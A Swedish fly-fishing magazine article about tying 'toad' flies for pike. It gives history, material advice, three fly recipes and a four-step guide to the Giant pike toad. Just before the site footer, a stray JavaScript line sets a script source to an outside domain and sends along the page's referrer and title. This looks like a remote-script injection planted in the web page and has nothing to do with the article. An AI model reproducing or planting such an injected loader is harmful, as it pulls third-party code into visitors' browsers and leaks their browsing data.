En padda för krokodiler

Toadflugorna används ofta för flatsen men de fungerar grymt på våra svenska gäddor. Dessutom är de roliga att binda. Magnus Nygren visar allt i detalj.

The Toad, Tarpon toad eller Tasty toad som den också kallas är en märklig skapelse som nått enorma framgångar i USA efter framför allt tarpon.
Föregångaren till dagens toadflugor uppfanns av Harry Spears och skulle locka lättskrämda bonefish att hugga. De första toadflugorna för tarpon skapades av Garry Merriman och hade en stjärt av upp- och nedvänd kaninzonkerremsa, men i dag är det nog vanligast att man binder dem med marabou.
Jag vet inte vad en toad ska likna. Man ser i och för sig tydliga likheter med krabbflugan Merkin, men av namnet att döma så borde det vara en padda eftersom toad betyder just padda.

Jag har fiskat med olika varianter av toadflugor efter både tarpon och gädda. Om man binder sina toadflugor med marabou och lindar det som ett hackel som jag gör och har gädda i åtanke så bör man använda sig av något syntetmaterial som stjärt för att få en längre fluga.
Jag föredrar att använda Bigflyfibrer, då får man volymen på köpet eftersom den översta delen på Bigflyfibrerna (där man binder in dem på kroken) är lockig. Man kan också använda sig av tuppsaddlefjädrar inbundna på varsin sida av maraboustjärten, för att få lite extra längd på flugan. Jag har en variant på det temat som jag kallar för The burning toad, en fluga som påminner om en eldslåga. The burning toad är en superbra fluga som har gett mig oförglömliga minnen både på de kubanska flatsen och i de svenska gäddvikarna.

Flugtypen är kul att binda. Det mest iögonfallande är huvudet/kroppen som är gjord av polygarnbuntar, inbundna horisontalt med så kallad »åtta-lindning«, samma metod som man använder för att binda in kulkedjeögon. Om man vill binda en tvåfärgad fluga med ljusare undersida så lägger man helt enkelt polygarnbuntarna på varandra och binder in med den ljusare bunten ner mot krokskaftet. För bästa effekt bör man använda en bindtråd i samma färg som polygarnet.
Om man vill kan man sedan klippa det undre ljusare polygarnet lite kortare än det övre mörkare. På så sätt får flugan en mörkare kontur när man (fisken) ser den underifrån. Det är knappast avgörande för framtida fångster men det ger flugan det lilla extra och man vet ju aldrig …
Polygarn finns i en uppsjö av färger, såväl enfärgade som mixade. Problemet är att det kan vara svårt att få tag i de lite gladare färgerna eftersom materialet oftast används till vingar/vingsäckar när man binder puppflugor.

Hittar man inte polygarn i önskad färg, så är Ep-Fiber ett bra alternativ, det finns i de flesta färger och även i en 3D-variant med färgkombinationer som Ocean blue, Baitfish olive och Sand för att nämna några.
En viktig sak när man binder en toad är att fundera på när och var man tänker använda den. Originalet binds med lätta ögon av plast eller med fly eyes för att få en svävande fluga.
Jag föredrar att binda mina toads med kulkedjeögon för att flugan ska komma ned igenom ytskiktet. Annars tenderar de att ligga kvar på ytan om man använder en lätt krok och flytlina.

Eldig. Testa gärna varianten The burning toad i starkt humusfärgade vatten.


The burning toad
Krok: Tiemco 600 sp, Owner aki saltwater, Gamakatsu sc15 eller liknande saltvattenskrok.
Stjärt/vinge: Orange marabou och gula tuppsaddlefjädrar.
Krage: Two toned kaninzonkerstrimla i gult och orange.
Kropp/huvud: Orange polygarn.
Ögon: Kulkedjeögon.
Bindtråd: Gul.

Fin form. Paddframkroppen trycker undan mycket vatten och skapar bra vibrationer i vattnet.


Rac-hair zonker toad
Krok: Tiemco 8089 stl 2.
Stjärt/vinge: En ögla av grov nylon och en 6–7cm lång vit Rac-hair zonkerstrimla.
Krage: Vit Rac-hair zonkerstrimla, lindad som hackel i 2–3 varv och en bunt med olive Rac-hair ovanpå.
Flash: Ett strå med chartreusefärgad Lateral scale på varsin sida om kragen.
Kropp/huvud: Vit och olive polygarn.
Ögon: Kulkedjeögon.
Bindtråd: Vit.

Giant pike toad
Krok: Ad swier absolute pike stl 4/0.
Bindtråd: Vit.
Stjärt/vinge: En ögla av grov nylon, ett par strån Mirage saltvattensflash och en bunt med vita Big flyfibrer.
Krage: Två vita och en röd maraboufjäder.
Kropp/huvud: Vitt och rött polygarn.
Ögon: Kulkedjeögon.
Bindtråd: Vit.

Giant pike toad i 4 steg

1 Fäst in bindtråden mitt på krokskaftet och linda den i jämna varv bakåt förbi krokspetsen. Klipp av en ca sex cm lång bit av 0.80 nylon och bind in den som en ögla och täck med superlim. Gå sedan fram med bindtråden till mitten på krokskaftet. Lägg en droppe med superlim på krokskaftets översida och bind in kulkedje-ögonen. Linda sedan bindtråden bakåt igen.2 Bind in ett par strån av Mirage saltvattensflash på mitten, vik dem sedan bakåt och säkra med bindtråden. Tag sedan en ordentlig bunt med vita bigflyfibrer och bind in dem ovanpå krokskaftet. Säkra med superlim. Använd en dubbingnål och kamma igenom bigflyfibrerna ordentligt.

3 Välj ut två vita och en röd maraboufjäder av bra kvallitet. Bind in den första vita maraboufjädern i spetsen och linda den som ett hackel tills stammen blir för tjock, säkra och klipp bort resterna. Gör sedan likadant med den andra vita maraboufjädern och avsluta med den röda. Eftersom den röda fjädern är den sista så är det extra viktigt att avsluta innan stammen blir för tjock.

4 Klipp ut 5–8 buntar med rött polygarn och lika många med vitt polygarn. Tag en bunt av det röda polygarnet och lägg den ovanpå en vit bunt. Placera sedan buntarna ovanpå och tvärs över krokskaftet precis framför den röda maraboun med den vita bunten ner mot krokskaftet och bind in dem med åttalindning. Fortsätt och bind in bunt efter bunt tills du är framme vid kul-kedjeögonen. Klipp sedan polygarnet så att huvudet/kroppen blir platt/krabbformad. Lägg sedan lite lack på inbindningsstället för varje polygarnbunt, lägg också lite lack på bindtråden vid ögonen.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ’&default_keyword=’ + encodeURIComponent(document.title) + ”;


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad